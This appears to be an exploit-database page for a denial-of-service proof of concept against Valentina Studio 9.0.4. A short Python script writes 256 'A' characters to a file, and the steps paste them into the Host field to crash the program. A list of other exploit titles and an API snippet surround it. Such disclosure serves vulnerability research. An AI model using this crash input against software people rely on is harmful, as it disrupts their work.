Menu

Improved exploit search engine. Try python and hit enter

"Valentina Studio 9.0.4 - 'Host' Denial of Service (PoC)"

Author

"Victor Mondragón"

Platform

windows

Release date

2019-02-19

Release Date Title Type Platform Author
2019-03-18 "WinAVI iPod/3GP/MP4/PSP Converter 4.4.2 - Denial of Service" dos windows Achilles
2019-03-18 "WinMPG Video Convert 9.3.5 - Denial of Service" dos windows Achilles
2019-03-15 "Mail Carrier 2.5.1 - 'MAIL FROM' Buffer Overflow" remote windows "Joseph McDonagh"
2019-02-22 "WinRAR 5.61 - Path Traversal" local windows WyAtu
2019-03-14 "FTPGetter Standard 5.97.0.177 - Remote Code Execution" remote windows w4fz5uck5
2019-03-13 "Apache Tika-server < 1.18 - Command Injection" remote windows "Rhino Security Labs"
2019-03-13 "Microsoft Windows MSHTML Engine - _Edit_ Remote Code Execution" local windows "Eduardo Braun Prado"
2019-03-13 "Core FTP Server FTP / SFTP Server v2 Build 674 - 'SIZE' Directory Traversal" dos windows "Kevin Randall"
2019-03-13 "Core FTP Server FTP / SFTP Server v2 Build 674 - 'MDTM' Directory Traversal" dos windows "Kevin Randall"
2019-03-13 "Microsoft Windows - .reg File / Dialog Box Message Spoofing" dos windows hyp3rlinx
2019-03-11 "PRTG Network Monitor 18.2.38 - Authenticated Remote Code Execution" webapps windows M4LV0
2019-03-11 "NetSetMan 4.7.1 - Local Buffer Overflow (SEH Unicode)" local windows "Devin Casadey"
2019-03-12 "Core FTP 2.0 build 653 - 'PBSZ' Denial of Service (PoC)" dos windows Hodorsec
2019-03-08 "McAfee ePO 5.9.1 - Registered Executable Local Access Bypass" webapps windows leonjza
2019-03-07 "Anyburn 4.3 x86 - 'Copy disc to image file' Buffer Overflow (Unicode) (SEH)" local windows Hodorsec
2019-03-04 "MarcomCentral FusionPro VDP Creator < 10.0 - Directory Traversal" webapps windows 0v3rride
2019-03-04 "Splunk Enterprise 7.2.4 - Custom App RCE (Persistent Backdoor - Custom Binary Payload)" webapps windows "Matteo Malvica"
2019-03-04 "STOPzilla AntiMalware 6.5.2.59 - Privilege Escalation (2)" local windows "Ivan Ivanovic"
2019-03-04 "Microsoft Edge Chakra 1.11.4 - Read Permission via Type Confusion" dos windows "Fahad Aid Alharbi"
2019-03-01 "Cisco WebEx Meetings < 33.6.6 / < 33.9.1 - Privilege Escalation" local windows SecureAuth
2019-02-28 "TransMac 12.3 - Denial of Service (PoC)" dos windows "Alejandra Sánchez"
2019-02-25 "Xlight FTP Server 3.9.1 - Buffer Overflow (PoC)" dos windows "Logan Whitmire"
2019-02-22 "Nuuo Central Management - Authenticated SQL Server SQL Injection (Metasploit)" remote windows Metasploit
2019-02-21 "Memu Play 6.0.7 - Privilege Escalation" local windows "Alejandra Sánchez"
2019-02-21 "RealTerm Serial Terminal 2.0.0.70 - 'Echo Port' Buffer Overflow (SEH)" local windows "Matteo Malvica"
2019-02-21 "Virtual VCR Max .0a - '.vcr' Buffer Overflow (PoC)" dos windows "Wade Guest"
2019-02-20 "WinRAR 5.61 - '.lng' Denial of Service" dos windows "Kağan Çapar"
2019-02-20 "FTPShell Server 6.83 - 'Account name to ban' Denial of Service (PoC)" dos windows "Victor Mondragón"
2019-02-18 "mIRC < 7.55 - Remote Command Execution Using Argument Injection Through Custom URI Protocol Handlers" remote windows ProofOfCalc
2019-02-19 "MaxxAudio Drivers WavesSysSvc64.exe 1.6.2.0 - File Permissions SYSTEM Privilege Escalation" local windows "Mike Siegel"
Release Date Title Type Platform Author
2019-02-20 "FTPShell Server 6.83 - 'Account name to ban' Denial of Service (PoC)" dos windows "Victor Mondragón"
2019-02-19 "BulletProof FTP Server 2019.0.0.50 - 'SMTP Server' Denial of Service (PoC)" dos windows "Victor Mondragón"
2019-02-19 "Valentina Studio 9.0.4 - 'Host' Denial of Service (PoC)" dos windows "Victor Mondragón"
2019-02-19 "NetSetMan 4.7.1 - 'Workgroup' Denial of Service (PoC)" dos windows "Victor Mondragón"
2019-02-15 "Navicat for Oracle 12.1.15 - _Password_ Denial of Service (PoC)" dos windows "Victor Mondragón"
2019-02-15 "Free IP Switcher 3.1 - 'Computer Name' Denial of Service (PoC)" dos windows "Victor Mondragón"
2019-02-14 "Core FTP/SFTP Server 1.2 Build 589.42 - 'User domain' Denial of Service (PoC)" dos windows "Victor Mondragón"
2019-02-05 "Device Monitoring Studio 8.10.00.8925 - Denial of Service (PoC)" dos windows "Victor Mondragón"
2018-11-12 "HeidiSQL 9.5.0.5196 - Denial of Service (PoC)" dos windows "Victor Mondragón"
2018-11-05 "Softros LAN Messenger 9.2 - Denial of Service (PoC)" dos windows_x86-64 "Victor Mondragón"
2018-11-01 "WebDrive 18.00.5057 - Denial of Service (PoC)" dos windows_x86-64 "Victor Mondragón"
2018-10-31 "SmartFTP Client 9.0.2615.0 - Denial of Service (PoC)" dos windows_x86-64 "Victor Mondragón"
2018-08-30 "NetworkActiv Web Server 4.0 Pre-Alpha-3.7.2 - 'Username' Denial of Service (PoC)" dos windows_x86-64 "Victor Mondragón"
import requests
response = requests.get('https://www.nmmapper.com/api/exploitdetails/46421/?format=json')
For full documentation follow the link above

Ads

Browse exploit DB API Browse

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
15
16
17
18
19
20
21
22
#Exploit Title: Valentina Studio 9.0.4 - Denial of Service (PoC)
#Discovery by: Victor Mondragón
#Discovery Date: 2018-02-19
#Vendor Homepage: https://valentina-db.com/en/
#Software Link: https://valentina-db.com/en/developer/database/download-valentina-database-adk
#Tested Version: 9.0.4
#Tested on: Windows 7 x64 Service Pack 1

#Steps to produce the crash:
#1.- Run python code: Valentina_Studio_9.0.4.py
#2.- Open valentina.txt and copy content to clipboard
#3.- Open Valentina Studio
#4.- Select "File" > "Connect to"
#5.- Select "Valentina Server"
#6.- Select "Host" and Paste Clipboard
#7.- Crashed

cod = "\x41" * 256

f = open('valentina.txt', 'w')
f.write(cod)
f.close()